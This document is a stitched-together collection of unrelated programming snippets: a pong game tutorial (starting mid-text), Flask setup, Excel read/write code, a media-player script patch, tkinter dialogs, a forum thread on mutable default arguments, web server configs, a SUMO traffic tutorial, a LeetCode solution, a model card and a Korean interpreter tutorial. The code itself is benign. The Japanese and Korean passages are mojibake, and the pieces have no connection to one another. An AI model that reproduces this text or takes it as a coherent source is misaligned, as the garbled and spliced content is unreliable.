But oops again, now if we get the ball to bounce off the computer player's paddle, it doesn't bounce off the walls. To make the ball bounce off the walls, we add this code that checks that the ball is lower than the top of the screen and higher than the bottom of the screen:
# make ball bounce off bottom and top walls
@play.repeat_forever
async def do():
if ball.bottom <= play.screen.bottom:
ball.dy = 1
elif ball.top >= play.screen.top:
ball.dy = -1
If the ball hits either the top or the bottom of the screen, the code above will reverse its speed so it bounces.
And that's it! A simple pong game in about 50 lines of code!
The final code
Here's all the code in the tutorial in one place:
import play
box = play.new_box(color='black', x=350, y=0, width=30, height=120)
other_box = play.new_box(color='black', x=-350, y=0, width=30, height=120)
other_box.dy = 3
ball = play.new_box(color='dark red', x=0, y=0, width=20, height=20)
ball.dx = 2
ball.dy = -1
@play.when_key_pressed('up')
async def do(key):
box.y += 10
@play.when_key_pressed('down')
async def do(key):
box.y -= 10
# make the ball move
@play.repeat_forever
async def do():
ball.x += ball.dx
ball.y += ball.dy
# make the ball bounce off the player's paddle
@play.repeat_forever
async def do():
if (ball.right >= box.left) and (ball.top >= box.bottom) and (ball.bottom <= box.top) and (ball.left < box.left):
ball.dx = -2
# make the computer player follow the ball
@play.repeat_forever
async def do():
if ball.x < 0 and abs(ball.y-other_box.y) > other_box.dy:
if other_box.y < ball.y:
other_box.y += other_box.dy
elif other_box.y > ball.y:
other_box.y -= other_box.dy
# make the ball bounce off the computer player's paddle
@play.repeat_forever
async def do():
if (ball.left <= other_box.right) and (ball.top >= other_box.bottom) and (ball.bottom <= other_box.top) and (ball.right > other_box.right):
other_box.dy = play.random_number(1, 4)
ball.dx = 2
# make ball bounce off bottom and top walls
@play.repeat_forever
async def do():
if ball.bottom <= play.screen.bottom:
ball.dy = 1
elif ball.top >= play.screen.top:
ball.dy = -1
play.start_program()
And here's a link to a repl with the code above.
More Challenges
This game is pretty simple. Can you think of other things to add to make it more fun? Here are some suggestions for things to try:
Can you make the paddles change colors when the ball hits them?
How would you keep track of and show scores in the game? (Hint: look up the play.new_text()function.)
Did you find any glitches in the game? How would you try to fix those glitches?
How would you make the ball change speed differently depending on where it hits on the paddle?
Could you add multiple balls to the game?
What else would you add to make the game more fun?
Python Play
Thanks for reading this tutorial! If you make anything with Python Play, please post it in the comments!
Python Play is currently in beta, which means some things may not work quite right. If you find a problem (usually called a "bug"), please send us a link to the repl where you found that bug.
To find out more about all the things you can do with Python Play, read the documentation here!
Look for more Python Play features coming soon! Try it out and let us know what you think!
|
Python Flask Web Application
Prerequisites
Python v3.6+
Usually come the Ubuntu 18.04 by default. Check version:
$ python3 --version Python 3.6.9
To create alias python -> python3, use this commands:
$ sudo update-alternatives --install /usr/bin/python python $(command -v python3) 1
update-alternatives: using /usr/bin/python3 to provide /usr/bin/python (python) in auto mode
Pip v3.6+
Install from package:
sudo apt-get update && sudo apt-get install python3-pip -y
Check version:
$ pip3 --version
pip 9.0.1 from /usr/lib/python3/dist-packages (python 3.6)
Create alias pip -> pip3:
$ sudo update-alternatives --install /usr/bin/pip pip /usr/bin/pip3 1
update-alternatives: using /usr/bin/pip3 to provide /usr/bin/pip (pip) in auto mode
Virtualenv
Install from pip:
sudo pip install virtualenv
Initialize Project
Create a new project directory and initialize virtual environment:
virtualenv env
Activate virtual environment:
source env/bin/activate
Install Flask
pip install flask
Create app.py:
from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
return "Hello, World!"
if __name__ == "__main__":
app.run()
Run the app:
python app.py
Go to http://127.0.0.1:5000/
|
首先安装两个库:pip install xlrd、pip install xlwt!
1.python读excel——xlrd
2.python写excel——xlwt
1.读excel数据,包括日期等数据
#coding=utf-8
import xlrd
import datetime
from datetime import date
def read_excel():
#打开文件
wb = xlrd.open_workbook(r'test.xlsx')
#获取所有sheet的名字
print(wb.sheet_names())
#获取第二个sheet的表明
sheet2 = wb.sheet_names()[1]
#sheet1索引从0开始,得到sheet1表的句柄
sheet1 = wb.sheet_by_index(0)
rowNum = sheet1.nrows
colNum = sheet1.ncols
#s = sheet1.cell(1,0).value.encode('utf-8')
s = sheet1.cell(1,0).value
#获取某一个位置的数据
# 1 ctype : 0 empty,1 string, 2 number, 3 date, 4 boolean, 5 error
print(sheet1.cell(1,2).ctype)
print(s)
#print(s.decode('utf-8'))
#获取整行和整列的数据
#第二行数据
row2 = sheet1.row_values(1)
#第二列数据
cols2 = sheet1.col_values(2)
#python读取excel中单元格内容为日期的方式
#返回类型有5种
for i in range(rowNum):
if sheet1.cell(i,2).ctype == 3:
d = xlrd.xldate_as_tuple(sheet1.cell_value(i,2),wb.datemode)
print(date(*d[:3]),end='')
print('\n')
if __name__ == '__main__':
read_excel()~
2.往excel写入数据
#coding=utf-8
import xlwt
#设置表格样式
def set_stlye(name,height,bold=False):
#初始化样式
style = xlwt.XFStyle()
#创建字体
font = xlwt.Font()
font.bold = bold
font.colour_index = 4
font.height = height
font.name =name
style.font = font
return style
#写入数据
def write_excel():
f = xlwt.Workbook()
#创建sheet1
sheet1 = f.add_sheet(u'sheet1',cell_overwrite_ok=True)
row0 = [u'业务',u'状态',u'北京',u'上海',u'广州',u'深圳',u'状态小计',u'合计']
column0 = [u'机票',u'船票',u'火车票',u'汽车票',u'其他']
status = [u'预定',u'出票',u'退票',u'业务小计']
for i in range(0,len(row0)):
sheet1.write(0,i,row0[i],set_stlye("Time New Roman",220,True))
i,j = 1,0
while i <4*len(column0): #控制循环:每次加4
#第一列
sheet1.write_merge(i,i+3,0,0,column0[j],set_stlye('Arial',220,True))
#最后一列
sheet1.write_merge(i,i+3,7,7)
i += 4
sheet1.write_merge(21,21,0,1,u'合计',set_stlye("Time New Roman",220,True))
i=0
while i<4*len(column0): #控制外层循环:每次加4
for j in range(0,len(status)): #控制内层循环:设置每一行内容
sheet1.write(i+j+1,1,status[j])
i += 4
#创建sheet2
sheet2 = f.add_sheet(u'sheet2',cell_overwrite_ok=True)
row0 = [u'姓名',u'年龄',u'出生日期',u'爱好',u'关系']
column0 = [u'UZI',u'Faker',u'大司马',u'PDD',u'冯提莫']
#生成第一行
for i in range(0,len(row0)):
sheet2.write(0,i,row0[i],set_stlye('Times New Roman',220,True))
#生成第一列
for i in range(0,len(column0)):
sheet2.write(i+1,0,column0[i],set_stlye('Times New Roman',220,True))
f.save('data.xls')
if __name__ == '__main__':
write_excel()~
本文章由 brokenway 发布在 个人知识库 ,文章所述不代表本站观点,法律风险由发布者自行承担,转载请注明出处!
|
Re: UPNP client script 0.5 [MM3]
Fri Jul 16, 2010 8:13 am
1. Visible not all nodes
2. Icons correspond to the name and type
3. Localize
4. Show Art Album if Album is present in library
'**********************************
'Define AFTER 'Dim NewSong'
'**********************************
Code: Select all
Dim NodeAllow 'Node Present (Video, for example, not visible)
Dim NodeIcon 'Icon for Node
Dim NodeClass 'NodeClass for Icon
'Null NodeClass AFTER 'title = ""'
'**********************************
Code: Select all
NodeClass = ""
'Define NodeClass AFTER 'title = y.childNodes(0).NodeValue'
'**********************************
Code: Select all
case "upnp:class"
NodeClass = y.childNodes(0).NodeValue
'Define NodeAllow and NodeClass AFTER 'next'
'**********************************
Code: Select all
NodeAllow = true 'Default is present
NodeIcon = Node.IconIndex 'Default icon of parent node
select case title 'Select icon for title
case "Browse Folders": NodeAllow = false
case "Pictures": NodeAllow = false
case "Video": NodeAllow = false
case "Music": NodeIcon = 40
case "Album": NodeIcon = 16
case "All Music": NodeIcon = 48
case "Artist": NodeIcon = 0
case "Folders": NodeIcon = 20
case "Genre": NodeIcon = 7
case "Playlists": NodeAllow = false
End select
select case NodeClass 'Select Icon for Class
case "object.container.person.musicArtist": NodeIcon = 0
case "object.container.album.musicAlbum": NodeIcon = 16
End select
'
LocalizeHERE
'**********************************
Code: Select all
title=SDB.Localize(title)
Code: Select all
If NodeAllow Then
Code: Select all
NewNode.IconIndex = NodeIcon
Code: Select all
End If
'Make 'Artist of Album' AFTER 'case "dc:creator"'
'**********************************
Code: Select all
if .AlbumArtistName=Empty Then .AlbumArtistName=y.childNodes(0).NodeValue
'Show Art Album if Album is present in libraryAFTER 'Trcks.AddTrack NewSong'
'**********************************
Code: Select all
NewSong.UpdateAlbum
'Show tree after once press on Node AFTER 'Trcks.FinishAdding'
'**********************************
Code: Select all
Node.Expanded = True
|
Una buena opción es usar el widget Text. Permite mostrar texto en diferentes lineas y darle el formato deseado (fuente, subrayado, color, tabulaciones, etc)
Un ejemplo implementado un popup que se abre al pulsar el botón Ayuda seria el siguiente:
import tkinter as tk
class Ayuda_Dialog:
def __init__(self, parent):
text = ("Paso1: De click en el botón de menú, posteriormente dirÃjase a...\n"
"Paso2: ...\n"
"Paso3: ...")
self.top = tk.Toplevel(parent)
self.top.title("Ayuda")
display = tk.Text(self.top)
display.pack()
display.insert(tk.INSERT, text)
display.config(state=tk.DISABLED)
b = tk.Button(self.top, text="Cerrar", command=self.cerrar)
b.pack(pady=5)
def cerrar(self):
self.top.destroy()
class Main_Window:
def __init__(self, root):
root.geometry("200x100")
tk.Button(root, text="Ayuda!", command = self.ayuda).pack()
def ayuda(self):
Ayuda_Dialog(root)
if __name__ == "__main__":
root = tk.Tk()
Main_Window(root)
root.mainloop()
Igual que se implementa en una ventana secundaria se puede implementar en la ventana principal.
Nota: Código para Python 3.x, para Python 2.x cambiar el import por import Tkinter as tk.
Ejemplo:
Edicion:
Si en vez de un botón queremos usar un Menu para lanzarlo, el procedimiento es el mismo:
import tkinter as tk
class Ayuda_Dialog:
def __init__(self, parent):
text = ("Paso1: De click en el botón de menú, posteriormente dirÃjase a...\n"
"Paso2: ...\n"
"Paso3: ...")
self.top = tk.Toplevel(parent)
self.top.title("Ayuda")
display = tk.Text(self.top)
display.pack()
display.insert(tk.INSERT, text)
display.config(state=tk.DISABLED)
b = tk.Button(self.top, text="Cerrar", command=self.cerrar)
b.pack(pady=5)
def cerrar(self):
self.top.destroy()
class Main_Window:
def __init__(self, root):
root.geometry("200x100")
mnuAyuda = tk.Menu(root)
mnuAyuda.add_command(label="Ayuda", command=self.ayuda)
root.config(menu=mnuAyuda)
def ayuda(self):
Ayuda_Dialog(root)
if __name__ == "__main__":
root = tk.Tk()
Main_Window(root)
root.mainloop()
|
NavView Template
niz
I've created a NavView template and put it on GitHub for anyone to use as a starting point for creating a NavView based app using Pythonista. https://github.com/ncarding/NavViewTemplate
I've done this because it took me ages to workout how to do it myself and I wanted to give something back to the community that unknowingly helped me workout all the problems along the way.
There is however a fairly large bug with the template that needs fixing before it is truly useful. I've tried various things and I just can't workout why the bug is there and how to fix it.
As it stands the NavView has two levels: Groups and People. You can create as many Groups as you like and have as many People in each group as you like.
The UI is built with Pythonista's ui module. The logic uses a custom object orientated module called simple_module. The objects that are created are saved and loaded (for persistence) using the pickle module.
Known Issue
The People lists should be independent of the Group lists, but at the moment they are not.
If you add a new Group then add one or more People to that group and then add a second Group, the People from the first Group are automatically added to the second and any additional Groups.
I can't tell where the bug is but it only effects Groups created with each launch of the app. E.g. If you create three Groups they will all contain the same People. If you then quit the app and relaunch it those people will still be in each Group but if you create more Groups they will not contain the original list of People. These new Groups will however all share any new People added to any of the Groups created in this session.
Any suggestions as to why this is happening and how I might fix it are welcome.
All the code is at https://github.com/ncarding/NavViewTemplate
abcabc
The "
init" method in simple_module.py is not correct. You can not have "empty list" as default parameter.
See the discussion here.
http://effbot.org/zone/default-values.htm
http://docs.python-guide.org/en/latest/writing/gotchas/
Mostly this should fix your bug. I have not tested it.
class Group():
def __init__(self, name, people = []):
self.name = name
# people is a list of People objects
self.people = people
ccc
The "fix" code contains an empty list as a default parameter. :-(. I would suggest:
class Group():
def __init__(self, name, people=None):
self.name = name
# people is a list of People objects
self.people = people or [] # converts None into an empty list
abcabc
It is not the fix. It is the part of the code that has the problem. I should have worded that properly. Anyway thanks for the correction.
ccc
I made a pull request on the repo so there is no ambiguity... I think you are correct that it should solve the open issue.
ccc
niz
Thank you for your help. This has indeed fixed the problem.
The code is there for anyone that wants to make use of it.
Phuket2
@niz , thanks for sharing. I have just tried it as I have doing nothing with the nav view before, well at least that I can remember.
But 2 things that stand out.
Seems like it would be easy to make it Python 2.7 and 3 compatible with a try on the pickle import, and maybe a protocol change that either version of pickle loaded could read an existing file.
Support for different presentations, i.e. Sheet, panel.
Just an idea
Phuket2
niz
Thanks @Phuket2 for the suggestions. I will look into them.
|
Šī darbība izdzēsīs vikivietnes lapu 'Server Configuration'. Vai turpināt?
Rophako uses the YamlSettings module for its configuration. There is a default settings file named defaults.yml; use it for reference to see what options are available.
To configure your site, create a file named settings.yml and define the keys/values that you want to override from the defaults. For example, if the only thing you want to change is the site’s name and secret key, the settings.yml can look as simple as this:
rophako:
site:
site_name: new-site.com
security:
secret_key: helloworld123456
The default config is loaded by the app first and then your custom settings are masked on top, so you only need to include the settings you want to change in the settings.yml. The defaults file is thoroughly commented, so check it out.
For simple sites you can configure Rophako to run as a mod_wsgi app.
In your Apache configuration:
<VirtualHost *:80>
ServerName www.example.com
WSGIDaemonProcess rophako user=www-data group=www-data threads=5 home=/home/www-data/git/rophako
WSGIScriptAlias / /home/www-data/git/rophako/app.wsgi
WSGIScriptReloading On
CustomLog /home/www-data/logs/access_log combined
ErrorLog /home/www-data/logs/error_log
<Directory /home/www-data/sites/rophako>
WSGIProcessGroup rophako
WSGIApplicationGroup %{GLOBAL}
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
A file named app.wsgi is included in the git repo. Here it is for reference. You may need to make changes to it if you use a different virtualenv:
#!/usr/bin/env python
"""WSGI runner script for the Rophako CMS."""
import sys
import os
# Add the CWD to the path.
sys.path.append(".")
# Use the 'rophako' virtualenv.
activate_this = os.environ['HOME']+'/.virtualenv/rophako/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from rophako import app as application
# vim:ft=python
For Kirsle.net I had a legacy document root full of random static files, so Rophako needed to serve the dynamic pages but let Apache serve all the legacy stuff.
Apache configuration:
# Rophako www.kirsle.net
<VirtualHost *:80>
ServerName www.kirsle.net
DocumentRoot /home/kirsle/www
CustomLog /home/kirsle/logs/access_log combined
ErrorLog /home/kirsle/logs/error_log
SuexecUserGroup kirsle kirsle
<Directory "/home/kirsle/www">
Options Indexes FollowSymLinks ExecCGI
AllowOverride All
Order allow,deny
Allow from all
</Directory>
<Directory "/home/kirsle/www/fcgi">
SetHandler fcgid-script
Options +ExecCGI
AllowOverride all
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
And in my .htaccess file in my document root:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /fcgi/index.fcgi/$1 [QSA,L]
RewriteRule ^$ /fcgi/index.fcgi/ [QSA,L]
</IfModule>
And finally, my FastCGI script. Important things to note:
sys.path and chdir to my git checkout folder for Rophako.ScriptNameStripper allows mod_rewrite to work best. Without it you’ll sometimes get URL paths like /fcgi/index.fcgi/blog/entry/... etc. from Flask because that’s what it thinks its path is.
#!/home/kirsle/.virtualenv/rophako/bin/python
import os
import sys
sys.path.append("/home/kirsle/git/rophako")
os.chdir("/home/kirsle/git/rophako")
from flup.server.fcgi import WSGIServer
from rophako import app
class ScriptNameStripper(object):
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = ""
return self.app(environ, start_response)
app = ScriptNameStripper(app)
if __name__ == "__main__":
WSGIServer(app).run()
This is how to get it set up with nginx, supervisor and gunicorn.
Install supervisor and create a config file like /etc/supervisor/conf.d/rophako.conf with these contents:
[program:rophako]
command = /home/www-data/.virtualenv/rophako/bin/gunicorn -b 127.0.0.1:9000 wsgi_gunicorn:app
environment = ROPHAKO_SETTINGS="/home/www-data/site/settings.ini"
directory = /home/www-data/git/rophako
user = www-data
Reload supervisor and start your app:
$ supervisorctl reread$ supervisorctl reload$ supervisorctl start rophako
Add your site to /etc/nginx/sites-available with a config like this:
server {
server_name www.example.com example.com;
listen 80;
root /home/www-data/git/rophako;
location /static {
alias /home/www-data/www/static;
}
location /favicon.ico {
alias /home/www-data/www/favicon.ico;
}
location / {
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_pass http://127.0.0.1:9000;
}
}
Start or restart nginx, service nginx restart
Next Step: Configuration and Plugins
Šī darbība izdzēsīs vikivietnes lapu 'Server Configuration'. Vai turpināt?
|
This tutorial sets up a competition (a collective 100 meter sprint) fordifferent traffic modes. You will learn how to create special lanes and(very simple) traffic lights in netedit, use different vehicle classesto define vehicle types and you will create flows for the differenttypes. All files can also be found in the <SUMO_HOME>/docs/tutorial/sumolympicsdirectory.
This tutorial is a reconstruction of a VISSIM Scenario devised by the PTV Group.
Building the Net#
Opennetedit and create a new network and add a singleedge by pressing e for entering the edge creation mode and clicking ontwo different locations in the editing area. Change to inspection mode(press i) and click on the starting point of the edge (at the locationof your first click). Now enter 0,0 in the textfield labeled pos inthe inspector panel on the left (see figure). Do the same for the edge'sendpoint, setting its position to 1000,0. Now save your network underthe name sumolypics.net.xml (press Ctrl+Shift-S).
Now we have a long road, which will be the stage of our competition. The participants in the competition will be transportation modes, i.e., busses, trams, bicycles, passenger cars, and feet. They should travel on different lanes side-by-side. Thus, we have to add lanes for each mode. To do so, right-click on the edge and hover over "add restricted lane" in the context menu. This will show you three choices for the creation of special purpose lanes: Sidewalk, Bikelane, and Buslane. Add one lane for each type.
To create a tram, we add a new lane by clicking on "Duplicate lane" in the same context menu. For that lane, we have to restrict the allowed vehicle class to trams. To do this, first uncheck the "select edges"-box just right of the edit mode dropdown menu in the toolbar (the mode should still be set to "(i)Inspect"). Then click on the newly created lane and on the button "allow" in the inspector panel. This opens a dialog with check boxes for all possible vehicle classes. Uncheck all but "rail_urban" and click on "accept". Now edit the allowances for the remaining lane (it is currently allowed for all vehicle classes) and reserve it to the class "passenger" (i.e. passenger cars).
Now let us split the edge to create a starting point for thecompetitors: Right-click somewhere on the edge and select "Split edgehere" from the context menu. Then click on the created node (in SUMOterminology this is already a "junction"). Set its x-coordinate to 900and its y-coordinate to 0 in the pos-field just as you did above whencreating the edge. Effectively, we have created a 100 meter runningtrack for the competitors with a 900 meter holding area for each of thecompeting modes. Now check the check box "select edges" again and renamethe two edges to "beg" and "end" (in the inspector panel). Save yournetwork (Ctrl-S).
Defining Competing Vehicle Types#
As a next step, we define the competing vehicle types. Open a new filecalled sumolympics.rou.xml and insert the following vehicle typedefinitions:
<routes> <vType id="pkw" length="5" maxSpeed="50" accel="2.6" decel="4.5" sigma="0.2" speedDev="0.2" vClass="passenger"/> <vType id="bus" length="15" maxSpeed="30" accel="1.2" decel="2.5" sigma="0.1" speedDev="0.1" vClass="bus"/> <vType id="tram" length="40" maxSpeed="13" accel="0.8" decel="0.5" sigma="0.1" speedDev="0.1" vClass="rail_urban"/> <vType id="bike" length="1.8" width="0.8" maxSpeed="7.5" accel="0.8" decel="1.5" sigma="0.5" speedDev="0.5" vClass="bicycle"/></routes>
Take a look at the vehicle type attributes description for details on these definitions.
For each vehicle type, we schedule and position vehicles transporting100 people by adding the following <flow .../> elements just below thevType definitions (within the <routes> element!):
... <flow id="pkw" type="pkw" from="beg" to="end" begin="0" end="0" number="66" departPos="last"/> <flow id="bus" type="bus" from="beg" to="end" begin="0" end="0" number="5" departPos="last"/> <flow id="tram" type="tram" from="beg" to="end" begin="0" end="0" number="2" departPos="last"/> <flow id="bike" type="bike" from="beg" to="end" begin="0" end="0" number="100" departPos="last"/> ...
To start the simulation, create a SUMO configuration file (name itsumolympics.sumocfg):
<configuration>
<input>
<net-file value="sumolympics.net.xml"/>
<route-files value="sumolympics.rou.xml"/>
</input>
<processing>
<lateral-resolution value="1." />
</processing>
</configuration>
Herewe give the processing argument lateral-resolution with a valuecorresponding to the sub-lane width in meters to achieve a morerealistic behavior of bicyclists utilizing the whole lane width toovertake each other (see SublaneModel and Bicyclesimulation). Start the simulation bydouble-clicking on the configuration file sumolympics.sumocfg(Windows) or running sumo-gui -c sumolympics.sumocfg from a terminal.Adjust the step delay to 100 ms and press the run button().
Defining a Start Signal (Traffic Light) and Pedestrians#
There are two things left to do for a fair and complete competition: 1) All competitors should be allowed to position freely in front of the scratch line (the bicyclists are inserted in a row, though they could achieve a much better result by grouping more densely using the whole lane width) 2) We wish to include pedestrians into the competition.
First we create a traffic light on thejunction between the edges "beg" and "end" with netedit: Press t toenter the traffic light editing mode. Click on the junction, then on"Create TLS" in the left panel. Below, under the label phases, type"rrrrr" for the first phase ("r" for red) and set its duration to 100(secs.). This will give enough time for the bicyclists to group moredensely. For the second phase enter "GGGGG" (yes, "G" for green) and setits duration to 1000 (i.e. until the end of the simulation run). Now runthe simulation again to see the bikes outrun the cars. See? We shouldall use our bikes more often!
If you have noticed a warning (like "Warning: Missing yellow phase in tlLogic 'gneJ2', program '0' for tl-index 0 when switching to phase 0") in the Message Window, don't worry. SUMO routinely checks tls-phases for basic consistency and missing yellow phases may lead to crashes if you have intersecting flows. However, this is a special situation and we don't need to care about this, obviously. If you want to learn more about traffic light control, see the TraCI-Tutorials TraCIPedCrossing and TraCI4Traffic_Lights or the main section on traffic lights.
What do you think, will pedestrians be slower or faster? Let's see. Youcan already guess that the approach is a little different forpedestrians. This is because they are no vehicle class (not any more),but constitute an own class called "person". For instance, there is nosuch element as a person flow analogous to vehicle flows, yet (though itis coming, see #1515). So, we are going to write a python script to generatea routefile sumolympic_walking.rou.xml. (Note that there is a littlescript in the <SUMO_HOME>/tools folder called
pedestrianFlow.py, which can beuseful if you would like to do more sophisticated things.)
Here's the simple script (call the file something likemakeSumolympicWalkers.py):
#!/usr/bin/python
#parameters
outfile = "sumolympicWalks.rou.xml"
startEdge = "beg"
endEdge = "end"
departTime = 0. #time of departure
departPos = -30. #position of departure
arrivalPos = 100. #position of arrival
numberTrips = 100 #number of persons walking
#generate XML
xml_string = "<routes>\n"
for i in range(numberTrips):
xml_string += ' <person depart="%f" id="p%d" departPos="%f" >\n' % (departTime, i, departPos)
xml_string += ' <walk edges="%s %s" arrivalPos="%f"/>\n' % (startEdge, endEdge, arrivalPos)
xml_string += ' </person>\n'
xml_string += "</routes>\n"
with open(outfile, "w") as f:
f.write(xml_string)
Execute the script by double-clicking (or from the command line withpython makeSumolympicWalkers.py). If you don't have python on yourcomputer, install it before doing anything else!(get it from here) We have toinclude the generated route file sumolympicWalks.rou.xml in the configfile sumolympic.sumocfg to let the simulation know about them. Severalroute files can be included by merely separating them by a comma.Therefore, modify the <route-files .../>-entry of our config to looklike this (be sure to put no spaces between the filenames!):
...
<route-files value="sumolympics.rou.xml,sumolympicWalks.rou.xml"/>
...
Get the popcorn and start the simulation!
References#
Back to Tutorials.
|
Description
Given a string containing only three types of characters: ‘(‘, ‘)’ and ‘*’, write a function to check whether this string is valid. We define the validity of a string by these rules:
Any left parenthesis '('must have a corresponding right parenthesis')'.
Any right parenthesis ')'must have a corresponding left parenthesis'('.
Left parenthesis '('must go before the corresponding right parenthesis')'.
'*'could be treated as a single right parenthesis')'or a single left parenthesis'('or an empty string.
An empty string is also valid.
Example 1:
Input:"()"Output:True
Example 2:
Input:"(*)"Output:True
Example 3:
Input:"(*))"Output:True
Note:
The string size will be in the range [1, 100].
Explanation
two stacks one stores ‘(‘, one stores ‘*’. If encounter ‘)’, check if there still any ‘(‘ exist, it not, check if ‘*’ exists. If string like “*(“, then not valid.
Python Solution
class Solution:
def checkValidString(self, s: str) -> bool:
left = []
star = []
for i, ch in enumerate(s):
if ch == '*':
star.append(i)
elif ch == '(':
left.append(i)
else:
if len(left) == 0 and len(star) == 0:
return False
if len(left) > 0:
left.pop()
else:
star.pop()
while (len(left) > 0 and len(star) > 0):
if (left[-1] > star[-1]):
return False
left.pop()
star.pop()
return len(left) == 0
Time complexity: O(N).
Space complexity: O(N).
|
CKIP ALBERT Base Chinese
This project provides traditional Chinese transformers models (including ALBERT, BERT, GPT2) and NLP tools (including word segmentation, part-of-speech tagging, named entity recognition).
這個專案提供了繁體中文的 transformers 模型(包含 ALBERT、BERT、GPT2)及自然語言處理工具(包含斷詞、詞性標記、實體辨識)。
Homepage
Contributers
Usage
Please use BertTokenizerFast as tokenizer instead of AutoTokenizer.
請使用 BertTokenizerFast 而非 AutoTokenizer。
from transformers import (
BertTokenizerFast,
AutoModel,
)
tokenizer = BertTokenizerFast.from_pretrained('bert-base-chinese')
model = AutoModel.from_pretrained('ckiplab/albert-base-chinese-ner')
For full usage and more information, please refer to https://github.com/ckiplab/ckip-transformers.
有關完整使用方法及其他資訊,請參見 https://github.com/ckiplab/ckip-transformers 。
Downloads last month
0
|
Python3ã§smtp.logã使ã£ã¦Gmailã§ã¡ã¼ã«ãåºããã¨ããã¨ãAttributeError: module 'smtplib' has no attribute 'SMTP'ãã¨è¨ããã¾ããä½ãæªããæãã¦ãã ããã
batchMailerOne.py
#! /usr/bin/env python3
#
# batchMailerOne.py
# -*- coding: utf-8 -*-
#### START CUSTOMIZATION ####
smtp_host = 'smtp.gmail.com'
smtp_port = 587
from_email = 'foo <[email protected]>'
mail_subject = 'bar'
user_name = 'xxxxx no such mail [email protected]' # Gmail login name
user_password = 'xxxxxxxxx' # Gmail psswd (2 steps authorization is not supported)
# set mail address surrounded in double quote, ended with comma (you can send up to 100 mails a day)
to_emails = [
"recipient1 <[email protected]>",
"recipient2 <[email protected]>",
"recipient3 <[email protected]>",
]
# write your message between ''' and '''
message_text = '''
Dear someone,
Hello
'''
### END CUSTOMIZATION ###
from email import message
import smtplib
server = smtplib.SMTP(smtp_host, smtp_port)
server.ehlo()
server.starttls()
server.ehlo()
server.login(user_name, user_password)
for to_email in to_emails:
msg = message.EmailMessage()
msg.set_content(message_text)
msg['Subject'] = mail_subject
msg['From'] = from_email
msg['To'] = to_email
server.send_message(msg)
server.quit()
å®è¡æã®ã¨ã©ã¼
Traceback (most recent call last):
File "C:\Users\cf\batchMailerOne.py", line 31, in <module>
import smtplib
File "C:\Users\cf\Anaconda3\lib\smtplib.py", line 49, in <module>
import email.generator
File "C:\Users\cf\Anaconda3\lib\email\generator.py", line 14, in <module>
from copy import deepcopy
File "C:\Users\cf\Anaconda3\lib\copy.py", line 60, in <module>
from org.python.core import PyStringMap
File "C:\Users\cf\batchMailerOne.py", line 39, in <module>
server = smtplib.SMTP(smtp_host, smtp_port)
AttributeError: module 'smtplib' has no attribute 'SMTP'
Python ãã¼ã¸ã§ã³
C:\Users\cf>\Users\cf\Anaconda3\python.exe -VPython 3.6.3 :: Anaconda, Inc.
|
I haven't touched python and virtualenv in a while, and I believe I setup my MBP with virtualenv and pip, but have totally forgotten how this stuff works.
After installing lion, I'm getting this error when I open up a new terminal window:
Traceback (most recent call last):
File "<string>", line 1, in <module>
ImportError: No module named virtualenvwrapper.hook_loader
virtualenvwrapper.sh: There was a problem running the initialization hooks. If Python could not import the module virtualenvwrapper.hook_loader, check that virtualenv has been installed for VIRTUALENVWRAPPER_PYTHON=/usr/bin/python and that PATH is set properly.
Any tips on how to fix this?
Trying:
easy_install eventlet
I got this:
Traceback (most recent call last):
File "/usr/local/bin/easy_install", line 5, in <module>
from pkg_resources import load_entry_point
File "/System/Library/Frameworks/Python.framework/Versions/2.6/Extras/lib/python/pkg_resources.py", line 2607, in <module>
parse_requirements(__requires__), Environment()
File "/System/Library/Frameworks/Python.framework/Versions/2.6/Extras/lib/python/pkg_resources.py", line 565, in resolve
raise DistributionNotFound(req) # XXX put more info here
pkg_resources.DistributionNotFound: setuptools==0.6c11
|
문ë²ë ì´ëì ë ê°ì¶ì´ì¡ì¼ë ì¸í°í리í°ê° ì´ë»ê² 구ì±ëëì§ ììë´ ìë¤.
(ì´ë¯¸ì§ ì¶ì²: Letâs Build A Simple Interpreter. Part 13: Semantic Analysis.)
먼ì Lexerë¡ ìì¤ì½ë를 í í° ë¨ìë¡ ë¶ìíê³ , Parserë¡ ì°ì ììì ë§ì¶°ì Abstract Syntax Tree를 ë§ë¤ì´ì¤ ë¤, Semantic Analyzerë¡ Type checking ê°ì ì미 ë¶ìì íê³ , ìµì¢ ì ì¼ë¡ Interpreterê° ì°ì°í´ì íë¡ê·¸ë¨ì ì¤ííë ê²ì ëë¤.
ê·¸ë¼ ë¨¼ì , Lexer를 ë§ë¤ì´ë³´ëë¡ í©ìë¤.
í í°ì êµì´ì ííìì ë¹ì·í ê°ë
ì
ëë¤. ííìê° ë¬¸ì¥ì ì´ë£¨ë ì미를 ê°ì§ ê°ì¥ ìì ììì¸ ê²ê³¼ ê°ì´ í í°ì ì미를 ê°ì§ë ê¸ìë¼ë¦¬ 모ìë ìì¤ì½ë를 ì´ë£¨ë ê°ì¥ ìì ììì
ëë¤. ìì¤ì½ë를 í í°ì¼ë¡ 쪼ê°ì£¼ë ê²ì Lexerë¼ê³ í©ëë¤.
ì´ë¥¼ í ë©´, ë¤ìê³¼ ê°ì ì½ëê° ììµëë¤.
10*2+3
ì´ ì½ë를 ë¤ìê³¼ ê°ì´ 쪼갤 ì ìì´ì¼ í©ëë¤.
NUMBER 10STAR *NUMBER 2PLUS +NUMBER 3
ì ê·¸ë¼ ì¸ì´ì í í°ë¤ì ìê°í´ë´
ìë¤.
í í°ë¤ì 구íí ëë§ë¤ ì¶ê°ë ìì ì´ì§ë§, íì¬ ì ê° êµ¬ìíê³ ìë í í°ë¤ì Python Enumì¼ë¡ ì 리íë©´ ë¤ìê³¼ ê°ìµëë¤.
from enum import Enum, auto
class TokenType(Enum):
LEFT_PAREN = auto() # (
RIGHT_PAREN = auto() # )
LEFT_BRACE = auto() # {
RIGHT_BRACE = auto() # }
LEFT_BRACKET = auto() # [
RIGHT_BRACKET = auto() # ]
SEMICOLON = auto() # ;
COMMA = auto() # ,
